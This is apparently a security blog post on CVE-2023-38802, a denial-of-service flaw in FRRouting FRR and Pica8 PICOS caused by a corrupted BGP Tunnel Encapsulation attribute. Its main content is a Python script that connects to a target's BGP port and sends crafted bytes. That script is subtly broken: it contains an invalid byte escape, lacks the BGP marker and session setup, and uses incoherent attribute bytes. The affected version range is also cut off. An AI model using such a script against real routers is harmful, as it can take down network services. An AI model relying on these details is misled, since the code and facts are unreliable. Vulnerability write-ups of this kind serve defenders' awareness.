CVE-2023-38802: Exploring the Remote Denial of Service Exploit in FRRouting FRR and Pica8 PICOS via a crafted BGP update

CVE-2023-38802 is a newly discovered vulnerability that affects FRRouting FRR versions 7.5.1 through 9. and Pica8 PICOS version 4.3.3.2. In this blog post, we will explore the vulnerability's details, provide a code snippet for better understanding, and list the original references for further reading. Please note that exploiting this vulnerability may have legal implications, and we do not promote the exploitation of this vulnerability for malicious purposes.

Exploit Details

The vulnerability, CVE-2023-38802, allows a remote attacker to cause a denial of service (DoS) via a carefully crafted BGP update message with a corrupted attribute 23 (Tunnel Encapsulation). BGP, or Border Gateway Protocol, is an essential Internet protocol for routing and reaching Internet networks in the Internet. FRR is an IP routing protocol suite for Linux and Unix platforms used by network administrators to exchange routing information between routers. Pica8 PICOS is a network operating system that provides Layer 2 and Layer 3 switching for white box SDN (Software-defined Networking) appliances.

By crafting the BGP update message with a corrupted Tunnel Encapsulation attribute, the attacker can exploit a vulnerability in FRR and Pica8 PICOS and cause a denial of service attack, rendering essential networking services unavailable.

Code Snippet

Here is a code snippet demonstrating the structure of a BGP update message with a corrupted attribute 23 (Tunnel Encapsulation):

import socket
import struct

target_ip = "192.168.1.1"  # Replace with your target IP
bgp_port = 179

bgp_header = b"\x04\xfe\x01\x00\x00\x2a\x01\x1c\xa"

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((target_ip, bgp_port))

path_attr = b"\x00\x1d\x17\x10\x00\x00\x00\x00\x80\x04\x02\x00\x00\x00"

corrupt_data = b"\x01\x01\x01\x01\x02\x02\x02\x02\x30\xbe\xef"  # Example of corrupted Tunnel Encapsulation attribute

send_data = bgp_header + path_attr + corrupt_data

sock.send(send_data)
sock.close()

Please note that the above code is an example and NOT intended for actual exploitation of this vulnerability.

Original References

For more information about this vulnerability, and to understand how it affects FRR and Pica8 PICOS, refer to the following original references:

1. FRRouting GitHub Repository - https://github.com/FRRouting/frr
2. Pica8 PICOS Platform Information - https://www.pica8.com/picos-platform/
3. BGP Protocol Specification - RFC 4271 - https://tools.ietf.org/html/rfc4271
4. CVE-2023-38802 Vulnerability Report - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-38802

Conclusion

CVE-2023-38802 is a critical vulnerability that poses a severe threat to FRRouting FRR and Pica8 PICOS platforms. A remote attacker can exploit this vulnerability and initiate a denial of service attack, affecting essential Internet services. It is crucial for network administrators and security researchers to be aware of this vulnerability and apply necessary patches or updates to protect against this exploit.

Note: The content in this post is for educational purposes only. Exploiting this vulnerability for malicious purposes may have legal implications.

Timeline

Published on: 08/29/2023 16:15:00 UTC
Last modified on: 09/19/2023 22:15:00 UTC